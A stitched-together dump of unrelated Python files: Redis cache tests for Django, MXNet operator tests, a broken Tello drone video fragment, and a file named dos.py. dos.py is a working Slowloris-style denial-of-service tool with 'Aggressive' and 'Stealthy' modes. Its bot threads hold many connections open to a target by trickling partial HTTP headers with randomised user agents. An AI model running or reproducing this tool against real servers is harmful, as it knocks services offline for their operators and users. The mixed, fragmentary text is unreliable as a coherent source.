self.cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(self.cache.get("key1"))
self.assertIsNone(self.cache.get("key2"))
def test_set_many_version(self):
self.cache.set_many({"key1": "spam", "key2": "eggs"}, version=2)
self.assertEqual(self.cache.get("key1", version=2), "spam")
self.assertEqual(self.cache.get("key2", version=2), "eggs")
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
self.cache.set("key1", "spam")
self.cache.set("key2", "eggs")
self.cache.set("key3", "ham")
self.cache.delete_many(["key1", "key2"])
self.assertIsNone(self.cache.get("key1"))
self.assertIsNone(self.cache.get("key2"))
self.assertEqual(self.cache.get("key3"), "ham")
# Test that passing an empty list fails silently
self.cache.delete_many([])
def test_clear(self):
# The cache can be emptied using clear
self.cache.set("key1", "spam")
self.cache.set("key2", "eggs")
self.cache.clear()
self.assertIsNone(self.cache.get("key1"))
self.assertIsNone(self.cache.get("key2"))
def test_long_timeout(self):
"""Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
"""
self.cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(self.cache.get('key1'), 'eggs')
self.cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(self.cache.get('key2'), 'ham')
self.cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(self.cache.get('key3'), 'sausage')
self.assertEqual(self.cache.get('key4'), 'lobster bisque')
def test_incr_version(self):
if isinstance(self.cache, RedisCache):
key = "key1"
self.cache.set(key, "spam", version=1)
self.assertEqual(self.cache.make_key(key), ':1:key1')
new_version = self.cache.incr_version(key, 1)
self.assertEqual(new_version, 2)
new_key = self.cache.make_key(key, version=new_version)
self.assertEqual(new_key, ':2:key1')
self.assertIsNone(self.cache.get(key, version=1))
self.assertEqual(self.cache.get(key, version=2), 'spam')
def test_pickling_cache_object(self):
p = pickle.dumps(self.cache)
cache = pickle.loads(p)
# Now let's do a simple operation using the unpickled cache object
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_float_caching(self):
self.cache.set('a', 1.1)
a = self.cache.get('a')
self.assertEqual(a, 1.1)
def test_string_float_caching(self):
self.cache.set('a', '1.1')
a = self.cache.get('a')
self.assertEqual(a, '1.1')
def test_setting_string_integer_retrieves_string(self):
self.assertTrue(self.cache.set("foo", "1"))
self.assertEqual(self.cache.get("foo"), "1")
def test_setting_bool_retrieves_bool(self):
self.assertTrue(self.cache.set("bool_t", True))
self.assertTrue(self.cache.get("bool_t"))
self.assertTrue(self.cache.set("bool_f", False))
self.assertFalse(self.cache.get("bool_f"))
def test_delete_pattern(self):
data = {
'a': 'a',
'b': 'b',
'aa': 'aa',
'bb': 'bb',
'aaa': 'aaa',
'bbb': 'bbb',
}
self.cache.set_many(data)
self.cache.delete_pattern('aa*')
items = self.cache.get_many(data.keys())
self.assertEqual(len(items), 4)
self.cache.delete_pattern('b?b')
items = self.cache.get_many(data.keys())
self.assertEqual(len(items), 3)
def test_clearing_using_version(self):
self.cache.set('a', 'a', version=1)
self.cache.set('b', 'b', version=1)
self.cache.set('a', 'a', version=2)
self.cache.set('b', 'b', version=2)
values = self.cache.get_many(['a', 'b'], version=1)
self.assertEqual(len(values), 2)
values = self.cache.get_many(['a', 'b'], version=2)
self.assertEqual(len(values), 2)
self.cache.clear(version=2)
values = self.cache.get_many(['a', 'b'], version=1)
self.assertEqual(len(values), 2)
values = self.cache.get_many(['a', 'b'], version=2)
self.assertEqual(len(values), 0)
def test_reinsert_keys(self):
self.cache._pickle_version = 0
for i in range(2000):
s = sha1(force_bytes(i)).hexdigest()
self.cache.set(s, self.cache)
self.cache._pickle_version = -1
self.cache.reinsert_keys()
def test_ttl_of_reinsert_keys(self):
self.cache.set('a', 'a', 5)
self.assertEqual(self.cache.get('a'), 'a')
self.cache.set('b', 'b', 5)
self.cache.reinsert_keys()
self.assertEqual(self.cache.get('a'), 'a')
self.assertGreater(self.cache.ttl('a'), 1)
self.assertEqual(self.cache.get('b'), 'b')
self.assertGreater(self.cache.ttl('a'), 1)
def test_get_or_set(self):
def expensive_function():
expensive_function.num_calls += 1
return 42
expensive_function.num_calls = 0
self.assertEqual(expensive_function.num_calls, 0)
value = self.cache.get_or_set('a', expensive_function, 1)
self.assertEqual(expensive_function.num_calls, 1)
self.assertEqual(value, 42)
value = self.cache.get_or_set('a', expensive_function, 1)
self.assertEqual(expensive_function.num_calls, 1)
self.assertEqual(value, 42)
value = self.cache.get_or_set('a', expensive_function, 1)
self.assertEqual(expensive_function.num_calls, 1)
self.assertEqual(value, 42)
time.sleep(2)
value = self.cache.get_or_set('a', expensive_function, 1)
self.assertEqual(expensive_function.num_calls, 2)
self.assertEqual(value, 42)
def test_get_or_set_serving_from_stale_value(self):
def expensive_function(x):
time.sleep(.5)
expensive_function.num_calls += 1
return x
expensive_function.num_calls = 0
self.assertEqual(expensive_function.num_calls, 0)
results = {}
def thread_worker(thread_id, return_value, timeout, lock_timeout, stale_cache_timeout):
value = self.cache.get_or_set(
'key',
lambda: expensive_function(return_value),
timeout,
lock_timeout,
stale_cache_timeout
)
results[thread_id] = value
thread_0 = threading.Thread(target=thread_worker, args=(0, 'a', 1, None, 1))
thread_1 = threading.Thread(target=thread_worker, args=(1, 'b', 1, None, 1))
thread_2 = threading.Thread(target=thread_worker, args=(2, 'c', 1, None, 1))
thread_3 = threading.Thread(target=thread_worker, args=(3, 'd', 1, None, 1))
thread_4 = threading.Thread(target=thread_worker, args=(4, 'e', 1, None, 1))
# First thread should complete and return its value
thread_0.start() # t = 0, valid from t = .5 - 1.5, stale from t = 1.5 - 2.5
# Second thread will start while the first thread is still working and return None.
time.sleep(.25) # t = .25
thread_1.start()
# Third thread will start after the first value is computed, but before it expires.
# its value.
time.sleep(.5) # t = .75
thread_2.start()
# Fourth thread will start after the first value has expired and will re-compute its value.
# valid from t = 2.25 - 3.25, stale from t = 3.75 - 4.75.
time.sleep(1) # t = 1.75
thread_3.start()
# Fifth thread will start after the fourth thread has started to compute its value, but
# before the first thread's stale cache has expired.
time.sleep(.25) # t = 2
thread_4.start()
thread_0.join()
thread_1.join()
thread_2.join()
thread_3.join()
thread_4.join()
self.assertEqual(results, {
0: 'a',
1: None,
2: 'a',
3: 'd',
4: 'a'
})
def assertMaxConnection(self, cache, max_num):
for client in cache.clients.values():
self.assertLessEqual(client.connection_pool._created_connections, max_num)
def test_max_connections(self):
pool._connection_pools = {}
cache = caches['default']
def noop(*args, **kwargs):
pass
releases = {}
for client in cache.clients.values():
releases[client.connection_pool] = client.connection_pool.release
client.connection_pool.release = noop
self.assertEqual(client.connection_pool.max_connections, 2)
cache.set('a', 'a')
self.assertMaxConnection(cache, 1)
cache.set('a', 'a')
self.assertMaxConnection(cache, 2)
with self.assertRaises(redis.ConnectionError):
cache.set('a', 'a')
self.assertMaxConnection(cache, 2)
for client in cache.clients.values():
client.connection_pool.release = releases[client.connection_pool]
client.connection_pool.max_connections = 2 ** 31
def test_has_key_with_no_key(self):
self.assertFalse(self.cache.has_key('does_not_exist'))
def test_has_key_with_key(self):
self.cache.set('a', 'a')
self.assertTrue(self.cache.has_key('a'))
def test_ttl_set_expiry(self):
self.cache.set('a', 'a', 10)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 10)
def test_ttl_no_expiry(self):
self.cache.set('a', 'a', timeout=None)
ttl = self.cache.ttl('a')
self.assertIsNone(ttl)
def test_ttl_past_expiry(self):
self.cache.set('a', 'a', timeout=1)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 1)
time.sleep(1.1)
ttl = self.cache.ttl('a')
self.assertEqual(ttl, 0)
def test_non_existent_key(self):
"""Non-existent keys are semantically the same as keys that have
expired.
"""
ttl = self.cache.ttl('does_not_exist')
self.assertEqual(ttl, 0)
def test_persist_expire_to_persist(self):
self.cache.set('a', 'a', timeout=10)
self.cache.persist('a')
self.assertIsNone(self.cache.ttl('a'))
def test_touch_no_expiry_to_expire(self):
self.cache.set('a', 'a', timeout=None)
self.cache.touch('a', 10)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 10)
def test_touch_less(self):
self.cache.set('a', 'a', timeout=20)
self.cache.touch('a', 10)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 10)
def test_touch_more(self):
self.cache.set('a', 'a', timeout=10)
self.cache.touch('a', 20)
ttl = self.cache.ttl('a')
self.assertAlmostEqual(ttl, 20)
class ConfigurationTestCase(SetupMixin, TestCase):
@override_settings(
CACHES={
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': LOCATION,
'OPTIONS': {
'DB': 15,
'PASSWORD': 'yadayada',
'PARSER_CLASS': 'path.to.unknown.class',
'PICKLE_VERSION': 2,
'CONNECTION_POOL_CLASS': 'redis.ConnectionPool',
'CONNECTION_POOL_CLASS_KWARGS': {
'max_connections': 2,
}
},
},
}
)
def test_bad_parser_import(self):
with self.assertRaises(ImproperlyConfigured):
caches['default']
@override_settings(CACHES={
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': [
'redis://:yadayada@localhost:6381/15',
'redis://:yadayada@localhost:6382/15',
'redis://:yadayada@localhost:6383/15',
],
'OPTIONS': {
'DB': 1,
'PASSWORD': 'yadayada',
'PARSER_CLASS': 'redis.connection.HiredisParser',
'PICKLE_VERSION': -1,
'MASTER_CACHE': 'redis://:yadayada@localhost:6381/15',
},
},
})
class RedisUrlRegressionTests(SetupMixin, TestCase):
def test_unix_path_error_using_redis_url(self):
pass
|
dos.py
|
# Date: 09/25/2018
# Author: Pure-L0G1C
# Description: Dos Attack
import socket
from time import sleep
from threading import Thread
from random import randint, choice
from string import ascii_lowercase
class Useragent(object):
@property
def get_win_version(self):
versions = []
version = 4.0
while version <= 10:
versions.append(version)
version = round(version+0.1, 2)
return choice(versions)
@property
def get_chrome_version(self):
a = randint(40, 69)
b = randint(2987, 3497)
c = randint(80, 140)
return '{}.0.{}.{}'.format(a, b, c)
def get(self):
a = 'Mozilla/5.0 (Windows NT {}; Win64; x64)'.format(self.get_win_version)
b = 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{} Safari/537.36'.format(self.get_chrome_version)
return '{} {}'.format(a, b)
class Session(object):
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.session = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connect(self, header):
is_connected = False
try:
self.session.connect((self.ip, self.port))
self.send_packet(header)
is_connected = True
except:pass
finally:
return is_connected
def send_packet(self, packet):
sent = False
try:
self.session.sendall(packet)
sent = True
except:pass
finally:
return sent
def close(self):
try:
self.session.close()
except:pass
class Bot(object):
def __init__(self, ip, port, is_aggressive):
self.ip = ip
self.port = port
self.session = None
self.is_alive = True
self.useragent = None
self.useragent_usage = 0
self.max_useragent_usage = 16
self.useragent_obj = Useragent()
self.is_aggressive = is_aggressive
self._header = '''
GET /?{} HTTP/1.1\r\n
User-Agent: {}\r\n\r\n
Accept-Language: en-US,en;q=0.9\r\n
Accept-Encoding: gzip, deflate, br\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n
'''.replace('\n\n', '\n').replace('\nGET', 'GET')
def sleep(self):
for _ in range(randint(5, 10)):
if self.is_alive:
sleep(1)
def start(self):
while self.is_alive:
try:
self.get_session()
if not self.session.connect(self.header):
self.session.close()
except:pass
else:
for _ in range(2):
pkt = self.packet
if not self.is_alive:break
if self.session.send_packet(pkt):
if not self.is_aggressive:self.sleep()
else:
break
self.session.close()
def stop(self):
self.is_alive = False
if self.session:
self.session.close()
def gen_useragent(self):
if not self.useragent_usage:
self.useragent = self.useragent_obj.get()
self.useragent_usage = 0 if self.useragent_usage >= self.max_useragent_usage else self.useragent_usage+1
@property
def header(self):
self.gen_useragent()
return self._header.format(self.text, self.useragent).encode()
@property
def packet(self):
return 'X-a: {}\r\n\r\n'.format(self.text).encode()
@property
def text(self):
printables = ascii_lowercase + ''.join([str(_) for _ in range(10)])
return ''.join([choice(printables) for _ in range(randint(3, 9))])
def get_session(self):
self.session = Session(self.ip, self.port)
class BotManager(object):
def __init__(self, ip, port, is_aggressive, max_bots):
self.bots = [Bot(ip, port, is_aggressive) for _ in range(max_bots)]
self.is_alive = True
self.port = port
self.ip = ip
def start(self):
session = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:session.connect((self.ip, self.port))
except:
print('Error: Unable to connect to the target. Proceeding anyway')
for bot in self.bots:
t = Thread(target=bot.start)
t.daemon = True
t.start()
def stop(self):
for bot in self.bots:
t = Thread(target=bot.stop)
t.daemon = True
t.start()
self.is_alive = False
class Cyclops(object):
def __init__(self, ip, port, threads, is_aggressive=True):
self.ip = ip
self.port = port
self.threads = threads
self.is_aggressive = is_aggressive
self.bot_manager = BotManager(ip, port, is_aggressive, threads)
def start(self):
try:
Thread(target=self.bot_manager.start, daemon=True).start()
mode = 'Aggressive' if self.is_aggressive else 'Stealthy'
print('Target: {}:{}\nMode: {}\nBots: {}'.format(self.ip, self.port, mode, self.threads))
except:
self.bot_manager.stop()
def stop(self):
self.bot_manager.stop()
|
video-stream.py
|
#Connect computer to Tello via Tello's Wi-Fi
Drone=tello.Tello('', 8889) #open socket to Tello
self.thread = threading.Thread(target=self.videoLoop) #begin pulling video data
self.frame = self.tello.read() #read tello video frame
image = Image.fromarray(self.frame) #convert frame to image
self.panel.image = image #update GUI image
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_context(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
